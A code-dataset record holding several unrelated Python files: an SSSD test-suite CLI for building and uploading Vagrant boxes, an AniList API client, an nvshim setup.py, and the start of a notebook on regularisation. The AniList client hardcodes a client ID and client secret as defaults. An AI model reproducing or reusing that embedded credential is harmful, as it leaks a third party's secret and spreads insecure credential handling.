params)\n\n\nclass SSHVagrantCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n 'guest',\n type=str,\n choices=self.linux\n )\n\n def run(self, args, params=[]):\n self.vagrant.run([self.name] + [args.guest], params)\n\n\nclass RDPVagrantCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n 'guest',\n type=str,\n choices=self.windows\n )\n\n def run(self, args, params=[]):\n self.vagrant.run([self.name] + [args.guest], params)\n\n\nclass ProvisionHostCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n '-p', '--pool', action='store', type=str, dest='pool',\n help='Location of libvirt storage pool that '\n 'will be named as \"sssd-test-suite\"',\n required=True\n )\n\n def run(self, args, params=[]):\n if not self.installAnsible():\n print(\"Please, install 'ansible' first.\")\n return\n\n params.append('--extra-vars')\n params.append('LIBVIRT_STORAGE=%s' % args.pool)\n self.ansible.run('prepare-host.yml', ['localhost'], params)\n\n def installAnsible(self):\n if self.shell.isCommandAvailable('ansible-playbook'):\n return True\n\n return self.shell.installCommand('ansible')\n\n\nclass ProvisionGuestsCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n '--all', action='store_true', dest='all',\n help='Provision all machines (default)'\n )\n\n self.parser.add_argument(\n '--ad', action=UniqueAppendConstAction, dest='guests',\n const='ad', help='Provision AD machine'\n )\n\n self.parser.add_argument(\n '--ad-child', action=UniqueAppendConstAction, dest='guests',\n const='ad-child', help='Provision AD child machine'\n )\n\n self.parser.add_argument(\n '--ipa', action=UniqueAppendConstAction, dest='guests',\n const='ipa', help='Provision IPA machine'\n )\n\n self.parser.add_argument(\n '--ldap', action=UniqueAppendConstAction, dest='guests',\n const='ldap', help='Provision LDAP machine'\n )\n\n self.parser.add_argument(\n '--client', action='append_const', dest='guests',\n const='client', help='Provision client machine'\n )\n\n self.parser.add_argument(\n '-e', '--enroll', action='store_true', dest='enroll',\n help='Enroll client to all domains'\n )\n\n def run(self, args, params=[]):\n if not args.enroll:\n params.append('--skip-tags=enroll-all')\n\n limit = ['all'] if args.guests is None else args.guests\n self.ansible.run('prepare-guests.yml', limit, params)\n\n\nclass EnrollCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n def run(self, args, params=[]):\n self.ansible.run('enroll.yml', ['all'], params)\n\n\nclass PruneBoxCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.re = re.compile(\n \"^[^']+'([^']+)' \\(v([^)]+)\\).*$\",\n re.MULTILINE\n )\n\n def run(self, args, params=[]):\n result = self.vagrant.run(\n ['box', 'prune'],\n params,\n stdout=subprocess.PIPE\n )\n\n for (box, version) in self.re.findall(result.stdout.decode('utf-8')):\n imgfile = '%s_vagrant_box_image_%s.img' % (\n box.replace('/', '-VAGRANTSLASH-'),\n version\n )\n imgfile = '%s/%s' % (self.pool, imgfile)\n\n print('Box %s, version %s is outdated.' % (box, version))\n print(' removing %s' % imgfile)\n\n if os.path.exists(imgfile):\n os.remove(imgfile)\n\n\nclass CreateBoxCommand(Command):\n class Task:\n def __init__(self, name, guests, task):\n self.name = name\n self.guests = guests\n self.task = task\n\n class Box:\n def __init__(self, createbox, guest, args):\n now = datetime.date.today()\n\n self.version = now.strftime('%Y%m%d.{}'.format(args.version))\n self.os = args.linux if guest in createbox.linux else args.windows\n self.name = 'sssd-%s-%s-%s' % (self.os, guest, self.version)\n self.file = '%s.box' % self.name\n self.outdir = args.output\n self.path = '%s/%s' % (self.outdir, self.file)\n self.metapath = '%s/%s.json' % (self.outdir, self.name)\n self.img = '%s/sssd-test-suite_%s.img' % (createbox.pool, guest)\n self.backup = '%s.bak' % self.img\n\n if guest in createbox.linux:\n self.vgfile = '%s/boxes/vagrant-files/linux.vagrantfile'\n else:\n self.vgfile = '%s/boxes/vagrant-files/windows.vagrantfile'\n\n self.vgfile = self.vgfile % createbox.dir\n\n def checksum(self, block_size=65536):\n sha256 = hashlib.sha256()\n with open(self.path, 'rb') as f:\n for block in iter(lambda: f.read(block_size), b''):\n sha256.update(block)\n\n return sha256.hexdigest()\n\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.boxvar = EnvVar('SSSD_TEST_SUITE_BOX')\n\n self.parser.add_argument(\n '-l', '--linux-os', action='store', type=str, dest='linux',\n help='Linux OS name', default='linux'\n )\n\n self.parser.add_argument(\n '-w', '--windows-os', action='store', type=str, dest='windows',\n help='Windows OS name', default='windows'\n )\n\n self.parser.add_argument(\n '-u', '--url', action='store', type=str, dest='url',\n help='URL where the resulting boxes will be stored',\n default='http://'\n )\n\n self.parser.add_argument(\n '-o', '--output', action='store', type=str, dest='output',\n help='Output directory where new boxes will '\n 'be stored (default = %s/boxes)' % self.dir,\n default=self.dir + '/boxes'\n )\n\n self.parser.add_argument(\n '-v', '--version', action='store', type=str, dest='version',\n help='Version number appended to current date (default = 01)',\n default='01'\n )\n\n self.parser.add_argument(\n '--all', action='store_const', dest='guests', const=self.guests,\n help='Create boxes of all guests (default)'\n )\n\n self.parser.add_argument(\n '--ad', action=UniqueAppendConstAction, dest='guests',\n const='ad', help='Create AD box'\n )\n\n self.parser.add_argument(\n '--ad-child', action=UniqueAppendConstAction, dest='guests',\n const='ad-child', help='Create AD child box'\n )\n\n self.parser.add_argument(\n '--ipa', action=UniqueAppendConstAction, dest='guests',\n const='ipa', help='Create IPA box'\n )\n\n self.parser.add_argument(\n '--ldap', action=UniqueAppendConstAction, dest='guests',\n const='ldap', help='Create LDAP box'\n )\n\n self.parser.add_argument(\n '--client', action='append_const', dest='guests',\n const='client', help='Create client box'\n )\n\n self.parser.add_argument(\n '--from-scratch', action='store_true', dest='scratch',\n help='Destroy existing guests and provision new ones'\n )\n\n self.provision = [\n self.Task('Destroy guests', self.guests, self.taskDestroy),\n self.Task('Update boxes', self.guests, self.taskUpdate),\n self.Task('Bring up guests', self.guests, self.taskUp),\n self.Task('Provision guests', [], self.taskProvision),\n ]\n\n self.tasks = [\n self.Task(\n 'Make all images readable',\n self.guests, self.taskMakeReadable\n ),\n self.Task(\n 'Halting all guests',\n [], self.taskHalt\n ),\n self.Task(\n 'Zero out empty space on linux machines',\n self.linux, self.taskZeroDisk\n ),\n self.Task(\n 'Create boxes',\n self.guests, self.taskCreateBox\n ),\n self.Task(\n 'Create metadata',\n self.guests, self.taskCreateMetadata\n )\n ]\n\n def run(self, args, params=[]):\n print('This operation may take hours to finish. Be patient.')\n print('It may ask you a sudo password for command: '\n 'chmod a+r %s/*.' % self.pool)\n\n if not args.guests:\n args.guests = self.guests\n\n tasks = self.tasks\n if args.scratch:\n tasks = self.provision + self.tasks\n\n total = len(tasks)\n current = 1\n\n self.boxvar.set('yes')\n try:\n for task in tasks:\n print('[%d/%d] %s' % (current, total, task.name))\n current += 1\n\n if not task.guests:\n task.task(args)\n continue\n\n for guest in task.guests:\n if guest in args.guests:\n box = self.Box(self, guest, args)\n self.step(guest, 'Task started')\n task.task(guest, box, args)\n except:\n raise\n finally:\n self.boxvar.restore()\n\n def step(self, guest, description):\n print(' [%s] %s' % (guest, description))\n\n def taskDestroy(self, guest, box, args):\n self.vagrant.run(['destroy', guest])\n\n def taskUpdate(self, guest, box, args):\n self.vagrant.run(['box', 'update', guest])\n\n def taskUp(self, guest, box, args):\n self.vagrant.run(['up', guest])\n\n def taskProvision(self, args):\n limit = ['all'] if args.guests is None else args.guests\n self.ansible.run(\n 'prepare-guests.yml', limit, ['--skip-tags=enroll-all']\n )\n\n def taskMakeReadable(self, guest, box, args):\n self.shell.run(['sudo', 'chmod', 'a+r', box.img])\n\n def taskHalt(self, args):\n self.vagrant.run(['halt'])\n\n def taskZeroDisk(self, guest, box, args):\n '''\n Zeroing disks takes lots of space because it needs to fill the\n whole space in the sparse file. Therefore it is better to do\n it one guest after another.\n '''\n self.step(guest, 'Starting guest')\n self.vagrant.run(['up', guest])\n self.step(guest, 'Zeroing empty space')\n self.ansible.run('prepare-box.yml', [guest])\n self.step(guest, 'Halting guest')\n self.vagrant.run(['halt', guest])\n self.step(guest, 'Compressing image')\n self.shell.run(['mv', '-f', box.img, box.backup])\n self.shell.run(['qemu-img', 'convert', '-O', 'qcow2',\n box.backup, box.img])\n self.shell.run(['rm', '-f', box.backup])\n\n def taskCreateBox(self, guest, box, args):\n self.shell.run(['mkdir', '-p', box.outdir])\n self.vagrant.run([\n 'package', guest,\n '--vagrantfile=%s' % box.vgfile,\n '--output=%s' % box.file\n ])\n self.shell.run(['mv', '-f', '%s/%s' % (self.dir, box.file), box.path])\n self.step(guest, 'Box stored as: %s' % box.path)\n\n def taskCreateMetadata(self, guest, box, args):\n self.step(guest, 'Computing checksum of %s' % box.path)\n\n if args.dryrun:\n return\n\n sha = box.checksum()\n meta = textwrap.dedent('''\n {{\n \"name\": \"sssd-{0}-{1}\",\n \"description\": \"SSSD Test Suite '{0}' {1}\",\n \"versions\": [\n {{\n \"version\": \"{2}\",\n \"status\": \"active\",\n \"providers\": [\n {{\n \"name\": \"libvirt\",\n \"url\": \"{3}/sssd-{0}-{1}-{2}.box\",\n \"checksum_type\": \"sha256\",\n \"checksum\": \"{4}\"\n }}\n ]\n }}\n ]\n }}\n ''')\n\n meta = meta.format(box.os, guest, box.version, args.url, sha).strip()\n\n with open(box.metapath, \"w\") as f:\n f.write(meta)\n\n\nclass VagrantCloudCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n '-t', '--token', action='store', type=str, dest='token',\n default=None, help='Vagrant cloud authentication token'\n )\n\n self.parser.add_argument(\n '-u', '--username', action='store', type=str, dest='username',\n default=None, help='Vagrant cloud username or organization name '\n 'where boxes are stored'\n )\n\n\nclass VagrantCloudSetupCommand(VagrantCloudCommand):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n def run(self, args, params=[]):\n data = {}\n\n if args.token is not None:\n data['token'] = args.token\n\n if args.username is not None:\n data['username'] = args.username\n\n with open('%s/vg-cloud.json' % self.dir, \"w\") as f:\n f.write(json.dumps(data))\n\n\nclass VagrantCloudListCommand(VagrantCloudCommand):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n def run(self, args, params=[]):\n cloud = VagrantCloud(self.dir, args.token, args.username)\n boxes = cloud.list()\n\n for box in boxes:\n print('- {:50s} ({})'.format(box.tag, box.version))\n\n\nclass VagrantCloudUploadCommand(VagrantCloudCommand):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n '--ipa', action='store', type=str, dest='ipa', default=None,\n help='Path to IPA box generated by create-box command'\n )\n\n self.parser.add_argument(\n '--ldap', action='store', type=str, dest='ldap', default=None,\n help='Path to LDAP box generated by create-box command'\n )\n\n self.parser.add_argument(\n '--client', action='store', type=str, dest='client', default=None,\n help='Path to client box generated by create-box command'\n )\n\n self.re = re.compile(\n \"^sssd-(.+)-.+-(.+)\\.box$\",\n re.MULTILINE\n )\n\n def run(self, args, params=[]):\n boxes = {\n 'ipa': args.ipa,\n 'ldap': args.ldap,\n 'client': args.client\n }\n\n cloud = VagrantCloud(self.dir, args.token, args.username)\n\n for guest, box in boxes.items():\n if box is None:\n continue\n\n (os, version) = self.parseBoxPath(box)\n\n boxname = '%s-%s' % (os, guest)\n\n print('[%s] Creating box %s (%s)' % (guest, boxname, version))\n cloud.boxCreate(\n boxname, 'sssd-test-suite: %s %s machine' % (os, guest)\n )\n cloud.versionCreate(\n boxname, version,\n 'See: https://github.com/SSSD/sssd-test-suite'\n )\n cloud.providerCreate(boxname, version, 'libvirt')\n print('[%s] Uploading box %s' % (guest, box))\n cloud.providerUpload(boxname, version, 'libvirt', box)\n cloud.versionRelease(boxname, version)\n print('[%s] Finished' % guest)\n\n def parseBoxPath(self, path):\n matches = self.re.findall(os.path.basename(path))\n if not matches or len(matches) > 1:\n raise ValueError('Invalid box path: %s' % path)\n\n return matches[0]\n\n\ndef main():\n # Split arguments on --\n args = sys.argv[1:]\n params = []\n\n if '--' in args:\n params = args[args.index('--') + 1:]\n args = args[:args.index('--')]\n\n # Prepare argument parser\n parser = argparse.ArgumentParser(\n description='SSSD Test Suite Command Line Interface.',\n epilog='All parameters placed after -- will be passed to underlying '\n 'vagrant or ansible calls. For example '\n '\"sssd-test-suite rdp ad -- -g 90%\"'\n )\n\n parser.add_argument(\n '-c', '--config', action='store', type=str, dest='config',\n help='Path to SSSD Test Suite configuration file',\n default=None\n )\n\n parser.add_argument(\n '--debug', action='store_true', dest='debug',\n help='Print commands that are executed.'\n )\n\n parser.add_argument(\n '--dry-run', action='store_true', dest='dryrun',\n help='Do not perform any chanes. Only print commands that '\n 'would be executed.'\n )\n\n subparser = parser.add_subparsers(title='Commands')\n\n # Setup commands\n BasicVagrantCommand(subparser, 'status', 'Show current state of guest machines')\n BasicVagrantCommand(subparser, 'up', 'Bring up guest machines')\n BasicVagrantCommand(subparser, 'halt', 'Halt guest machines')\n BasicVagrantCommand(subparser, 'destroy', 'Destroy guest machines')\n BasicVagrantCommand(subparser, 'reload', 'Restarts guest machines')\n BasicVagrantCommand(subparser, 'resume', 'Resume suspended guest machines')\n BasicVagrantCommand(subparser, 'suspend', 'Suspends guest machines')\n SSHVagrantCommand(subparser, 'ssh', 'Open SSH to guest machine')\n RDPVagrantCommand(subparser, 'rdp', 'Open remote desktop for guest machine')\n ProvisionHostCommand(subparser, 'provision-host', 'Provision host machine')\n ProvisionGuestsCommand(subparser, 'provision', 'Provision guests machines')\n EnrollCommand(subparser, 'enroll', 'Enroll client to all domains')\n BasicVagrantCommand(subparser, 'update', 'Update vagrant box', command=['box', 'update'])\n PruneBoxCommand(subparser, 'prune', 'Delete outdated vagrant boxes')\n CreateBoxCommand(subparser, 'create-box', 'Create vagrant box')\n VagrantCloudSetupCommand(subparser, 'cloud-setup', 'Setup your vagrant cloud token and username')\n VagrantCloudListCommand(subparser, 'cloud-list', 'List boxes stored in vagrant cloud')\n VagrantCloudUploadCommand(subparser, 'cloud-upload', 'Upload boxes to vagrant cloud')\n\n # Parse argument and run given command\n args = parser.parse_args(args)\n\n UtilOptions.debug = args.debug\n UtilOptions.dryrun = args.dryrun\n\n if args.config:\n config = EnvVar('SSSD_TEST_SUITE_CONFIG')\n config.set(args.config)\n\n if hasattr(args, 'func'):\n args.func(args, params)\n else:\n parser.print_help()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cli/sssd_test_suite.py","file_name":"sssd_test_suite.py","file_ext":"py","file_size_in_byte":22797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"335851425","text":"\"\"\"\nAnilist.py\nHandles all of the connections to Anilist.\n\"\"\"\n\nimport requests\nimport difflib\nimport traceback\nimport pprint\n\nANICLIENT = 'microline-1pfbw'\nANISECRET = 'ixezJaTKA11lb4wS69bavcKs9cK2jP'\n\nreq = requests.Session()\n\ntry:\n import Config\n ANICLIENT = Config.aniclient\n ANISECRET = Config.anisecret\nexcept ImportError:\n pass\n\naccess_token = ''\n\nescape_table = {\n \"&\": \" \",\n \"\\'\": \"\\\\'\",\n '\\\"': '\\\\\"',\n '/': ' ',\n '-': ' '\n #'!': '\\!'\n }\n\n#Anilist's database doesn't like weird symbols when searching it, so you have to escape or replace a bunch of stuff.\ndef escape(text):\n return \"\".join(escape_table.get(c,c) for c in text)\n\ndef getSynonyms(request):\n synonyms = []\n\n synonyms.append(request['title_english']) if request['title_english'] else None\n synonyms.append(request['title_romaji']) if request['title_romaji'] else None\n synonyms.extend(request['synonyms']) if request['synonyms'] else None\n\n return synonyms\n\n#Sets up the connection to Anilist. You need a token to get stuff from them, which expires every hour.\ndef setup():\n try:\n request = req.post('https://anilist.co/api/auth/access_token', params={'grant_type':'client_credentials', 'client_id':ANICLIENT, 'client_secret':ANISECRET})\n req.close()\n\n global access_token\n access_token = request.json()['access_token']\n except Exception as e:\n req.close()\n print('Error getting Anilist token')\n\n#Returns the list of all currently airing show\ndef getAnimeAiring():\n try:\n request = req.get(\"https://anilist.co/api/browse/anime/\", params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/browse/anime/\", params={'year':'2017', 'season':'fall', 'status':'currently airing', 'access_token':access_token}, timeout=10)\n req.close()\n\n #Of the given list of shows, we try to find the one we think is closest to our search term\n return request.json()\n\n except Exception as e:\n #traceback.print_exc()\n req.close()\n return None\n\n#Returns the closest anime (as a Json-like object) it can find using the given searchtext\ndef getAnimeDetails(searchText):\n try:\n sanitised_search_text = escape(searchText)\n\n request = req.get(\"https://anilist.co/api/anime/search/\" + sanitised_search_text, params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/anime/search/\" + sanitised_search_text, params={'access_token':access_token}, timeout=10)\n req.close()\n\n #Of the given list of shows, we try to find the one we think is closest to our search term\n closest_anime = getClosestAnime(searchText, request.json())\n\n if closest_anime:\n return getFullAnimeDetails(closest_anime['id'])\n else:\n return None\n\n except Exception as e:\n #traceback.print_exc()\n req.close()\n return None\n\n#Returns the anime details based on an id\ndef getAnimeDetailsById(animeID):\n try:\n return getFullAnimeDetails(animeID)\n except Exception as e:\n return None\n\n#Gets the \"full\" anime details (which aren't displayed when we search using the basic function). Gives us cool data like time until the next episode is aired.\ndef getFullAnimeDetails(animeID):\n try:\n request = req.get(\"https://anilist.co/api/anime/\" + str(animeID), params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/anime/\" + str(animeID), params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code == 200:\n anime = request.json()\n\n anime['genres'] = [genre for genre in anime['genres'] if genre]\n anime['synonyms'] = [synonym for synonym in anime['synonyms'] if synonym]\n\n return anime\n else:\n return None\n except Exception as e:\n #traceback.print_exc()\n req.close()\n return None\n\n#Given a list, it finds the closest anime series it can.\ndef getClosestAnime(searchText, animeList):\n try:\n animeNameList = []\n animeNameListNoSyn = []\n\n #For each anime series, add all the titles/synonyms to an array and do a fuzzy string search to find the one closest to our search text.\n #We also fill out an array that doesn't contain the synonyms. This is to protect against shows with multiple adaptations and similar synonyms (e.g. Haiyore Nyaruko-San)\n for anime in animeList:\n if 'title_english' in anime:\n animeNameList.append(anime['title_english'].lower())\n animeNameListNoSyn.append(anime['title_english'].lower())\n\n if 'title_romaji' in anime:\n animeNameList.append(anime['title_romaji'].lower())\n animeNameListNoSyn.append(anime['title_romaji'].lower())\n\n if 'synonyms' in anime:\n for synonym in anime['synonyms']:\n animeNameList.append(synonym.lower())\n\n listOfNameClose = difflib.get_close_matches(searchText.lower(), animeNameList, 1, 0.6)\n if len(listOfNameClose) < 1:\n return animeList[0]\n closestNameFromList = listOfNameClose[0]\n\n for anime in animeList:\n if (anime['title_english'].lower() == closestNameFromList.lower()) or (anime['title_romaji'].lower() == closestNameFromList.lower()):\n return anime\n else:\n for synonym in anime['synonyms']:\n if (synonym.lower() == closestNameFromList.lower()) and (synonym.lower() not in animeNameListNoSyn):\n return anime\n return None\n except:\n #traceback.print_exc()\n return None\n\n#Makes a search for a manga series using a specific author\ndef getMangaWithAuthor(searchText, authorName):\n try:\n request = req.get(\"https://anilist.co/api/manga/search/\" + searchText, params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/manga/search/\" + searchText, params={'access_token':access_token}, timeout=10)\n req.close()\n\n closestManga = getListOfCloseManga(searchText, request.json())\n fullMangaList = []\n\n for manga in closestManga:\n try:\n fullManga = req.get(\"https://anilist.co/api/manga/\" + str(manga['id']) + \"/staff\", params={'access_token':access_token}, timeout=10)\n req.close()\n\n if fullManga.status_code != 200:\n setup()\n fullManga = req.get(\"https://anilist.co/api/manga/\" + str(manga['id']) + \"/staff\", params={'access_token':access_token}, timeout=10)\n req.close()\n\n fullMangaList.append(fullManga.json())\n except:\n req.close()\n pass\n\n potentialHits = []\n for manga in fullMangaList:\n for staff in manga['staff']:\n isRightName = True\n fullStaffName = staff['name_first'] + ' ' + staff['name_last']\n authorNamesSplit = authorName.split(' ')\n\n for name in authorNamesSplit:\n if not (name.lower() in fullStaffName.lower()):\n isRightName = False\n\n if isRightName:\n potentialHits.append(manga)\n\n if potentialHits:\n return getClosestManga(searchText, potentialHits)\n\n return None\n\n except Exception as e:\n req.close()\n traceback.print_exc()\n return None\n\ndef getLightNovelDetails(searchText):\n return getMangaDetails(searchText, True)\n\n#Returns the closest manga series given a specific search term\ndef getMangaDetails(searchText, isLN=False):\n try:\n request = req.get(\"https://anilist.co/api/manga/search/\" + searchText, params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/manga/search/\" + searchText, params={'access_token':access_token}, timeout=10)\n req.close()\n\n closestManga = getClosestManga(searchText, request.json(), isLN)\n\n if (closestManga is not None):\n response = req.get(\"https://anilist.co/api/manga/\" + str(closestManga['id']), params={'access_token':access_token}, timeout=10)\n req.close()\n json = response.json()\n\n json['genres'] = [genre for genre in json['genres'] if genre]\n json['synonyms'] = [synonym for synonym in json['synonyms'] if synonym]\n\n return json\n else:\n return None\n\n except Exception as e:\n #traceback.print_exc()\n req.close()\n return None\n\n#Returns the closest manga series given an id\ndef getMangaDetailsById(mangaId):\n try:\n response = req.get(\"https://anilist.co/api/manga/\" + str(mangaId), params={'access_token':access_token}, timeout=10)\n req.close()\n return response.json()\n except Exception as e:\n req.close()\n return None\n\n#Used to determine the closest manga to a given search term in a list\ndef getListOfCloseManga(searchText, mangaList):\n try:\n ratio = 0.90\n returnList = []\n\n for manga in mangaList:\n alreadyExists = False\n for thing in returnList:\n if int(manga['id']) == int(thing['id']):\n alreadyExists = True\n break\n if (alreadyExists):\n continue\n\n if round(difflib.SequenceMatcher(lambda x: x == \"\", manga['title_english'].lower(), searchText.lower()).ratio(), 3) >= ratio:\n returnList.append(manga)\n elif round(difflib.SequenceMatcher(lambda x: x == \"\", manga['title_romaji'].lower(), searchText.lower()).ratio(), 3) >= ratio:\n returnList.append(manga)\n elif not (manga['synonyms'] is None):\n for synonym in manga['synonyms']:\n if round(difflib.SequenceMatcher(lambda x: x == \"\", synonym.lower(), searchText.lower()).ratio(), 3) >= ratio:\n returnList.append(manga)\n break\n return returnList\n except Exception as e:\n traceback.print_exc()\n return None\n\n#Used to determine the closest manga to a given search term in a list\ndef getClosestManga(searchText, mangaList, isLN=False):\n try:\n mangaNameList = []\n\n for manga in mangaList:\n if isLN and 'novel' not in manga['type'].lower():\n mangaList.remove(manga)\n elif not isLN and 'novel' in manga['type'].lower():\n mangaList.remove(manga)\n\n for manga in mangaList:\n mangaNameList.append(manga['title_english'].lower())\n mangaNameList.append(manga['title_romaji'].lower())\n\n for synonym in manga['synonyms']:\n mangaNameList.append(synonym.lower())\n\n closestNameFromList = difflib.get_close_matches(searchText.lower(), mangaNameList, 1, 0.60)[0]\n\n for manga in mangaList:\n if not ('one shot' in manga['type'].lower()):\n if (manga['title_english'].lower() == closestNameFromList.lower()) or (manga['title_romaji'].lower() == closestNameFromList.lower()):\n return manga\n\n for manga in mangaList:\n for synonym in manga['synonyms']:\n if synonym.lower() == closestNameFromList.lower():\n return manga\n\n return None\n except Exception as e:\n #traceback.print_exc()\n return None\n\nsetup()\n","sub_path":"AniListAPI.py","file_name":"AniListAPI.py","file_ext":"py","file_size_in_byte":12079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"175878104","text":"\"\"\"Setup project file\"\"\"\nimport os\nfrom datetime import datetime\nfrom typing import (\n Iterator,\n List,\n Set,\n)\n\nfrom setuptools import setup\n\nfrom src.nvshim import __version__ as PACKAGE_VERSION\nfrom src.nvshim.utils.constants import SHIMS as shims\n\n\ndef readme() -> str:\n \"\"\"Get all lines from read me file\"\"\"\n return \"\\n\".join(lines(\"README.md\"))\n\n\ndef lines(filepath) -> \"Iterator[str]\":\n \"\"\"Lines of a file generator\"\"\"\n with open(filepath, encoding=\"UTF-8\") as open_file:\n while True:\n line = open_file.readline()\n if line:\n yield line.strip()\n else:\n return\n\n\ndef get_requirements(filepath: str, visited: \"List[str]\") -> \"List[str]\":\n \"\"\"\n Get all pip requirements specified by a requirements file\n with support for nested requirements files\n\n :param filepath: path to requirements.txt file\n :param visited: mutable list of visited requirements.txt files\n :return: unordered list of requirements without versions\n \"\"\"\n requirements: \"Set[str]\" = set()\n filepath = os.path.realpath(filepath)\n rel_filepath = os.path.relpath(filepath)\n\n if filepath in visited:\n print(\"Skipping requirements:\", rel_filepath)\n print(visited)\n\n else:\n print(\"Parsing requirements:\", rel_filepath)\n visited.append(filepath)\n req_file_delim = \"-r\"\n req_package_delim = \"==\"\n requirements_dir = os.path.dirname(filepath)\n for line in lines(filepath):\n if line.startswith(\"#\"):\n continue\n if line.startswith(req_file_delim):\n nested_req_file = line.split(req_file_delim)[1].strip()\n nested_req_filepath = os.path.join(requirements_dir, nested_req_file)\n requirements.union(get_requirements(nested_req_filepath, visited))\n elif req_package_delim in line:\n requirements.add(line.split(req_package_delim)[0])\n\n return list(requirements)\n\n\ndef version_scheme(version) -> str:\n \"\"\"Convert version to version string\"\"\"\n if not os.getenv(\"CI\"):\n return PACKAGE_VERSION\n if version.exact:\n return version.format_with(\"{tag}\")\n return datetime.now().strftime(\"%Y.%m.%d.%H%M%S%f\")\n\n\nconsole_scripts = [\"nvm=nvshim.core.shim_nvm:main\"] + [\n f\"{s}=nvshim.core.shim:main\" for s in shims\n]\n\nsetup(\n author=\"Emmanuel Ogbizi-Ugbe\",\n author_email=\"iamogbz+pypi@gmail.com\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: End Users/Desktop\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development\",\n ],\n description=\"Automagically use the correct version of node\",\n entry_points={\"console_scripts\": console_scripts},\n include_package_data=True,\n install_requires=get_requirements(\"requirements/prod.txt\", []),\n keywords=\"node nvm node-shim shim shell nvm-shim\",\n long_description=readme(),\n long_description_content_type=\"text/markdown\",\n license=\"GNU\",\n name=\"nvshim\",\n packages=[\"nvshim\", \"nvshim.core\", \"nvshim.utils\"],\n package_dir={\"\": \"src\"},\n python_requires=\">=3\",\n setup_requires=[\"setuptools_scm\"],\n tests_require=get_requirements(\"requirements/test.txt\", []),\n url=\"http://github.com/iamogbz/nvshim\",\n # https://pypi.org/project/setuptools-scm/#configuration-parameters\n use_scm_version={\n \"local_scheme\": \"no-local-version\",\n \"version_scheme\": version_scheme,\n \"write_to\": \"./src/nvshim/__init__.py\",\n \"write_to_template\": '\"\"\"Current package version\"\"\"\\n__version__ = \"{version}\"\\n',\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5765093","text":"\n# coding: utf-8\n\n# 由于学习率太大,致使网络反向传播梯度过大,多数神经元权重置负,经过relu激活函数后,神经元权重置零,导致多数神经元坏死,网络呈现病态。后来降低了学习率,网络开始正常学习。\n\n# ## 正则化\n\n# 利用一条线将平面直角坐标系的两类数据点分开,如果线不能很好分开两类数据点,就是欠拟合,这是高偏差的情况;相反,如果线能非常完美分开两类数据点,会出现这条线只适用于这份数据,其它数据集的分类却不适用了,就是过拟合,这是高方差的情况。\n#\n# 如何做到线能合理分割数据集,适度拟合,即方差和偏差适中,就需要一系列的参数调整。\n\n# 模型训练的过程中,可以通过模型的训练准确度来判断算法的偏差高不高,如果偏差过高,就需要重新评估训练集,或者选择新的网络和更先进的算法,亦或者花费更多的时间进行网络训练。\n#\n# 但当使用验证集进行验证时候,发现模型预测的误差大大高于测试数据集的误差,这时候就需要注意模型过拟合的问题了,在数据较少的情况下,就需要使用正则化来减少过拟合了。\n\n# * 考虑如下情况:\n#\n# -- 逻辑回归成本函数$J$的最小值表达式为$min_{w, b}J(w, b)$;\n#\n# -- $w$和$b$是逻辑回归的两个参数,$w$是一个多维参数矢量, $b$是一个实数。\n\n# ### L1 正则化\n\n# -- $\\frac{\\lambda}{2m} \\times \\left|w\\right|$为正则化项;\n\n# $$J(w, b) = \\frac{1}{m}\\sum_{i=1}^{m}L(\\hat{y_i}, y_i) + \\frac{\\lambda}{2m}\\left|\\left|w\\right|\\right|_1$$\n\n# 如果使用L1正则化,$w$矩阵最终是稀疏的。\n\n# ### l2 正则化\n\n# -- $w$的欧几里德范数的平方等于$w_j$($j$值从$1$到$n_x$)平方的和,即$w^{T}w$;\n#\n# -- $\\frac{\\lambda}{2m} \\times w^{T}w$为正则化项;\n\n# $$J(w, b) = \\frac{1}{m}\\sum_{i=1}^{m}L(\\hat{y_i}, y_i) + \\frac{\\lambda}{2m}\\left|\\left|w\\right|\\right|^{2}_2$$\n\n# $w$可以表达高偏差问题,$b$只是一个常数,所以忽略不计。\n\n# $\\lambda$是正则化参数,通常使用验证集或者交叉验证集进行配置,同时倾向于将参数设置比较小,避免过拟合。\n\n# ###\n\n# ## 滑动平均模型\n\n# In[1]:\n\n\nimport os\nimport numpy as np\nimport tensorflow as 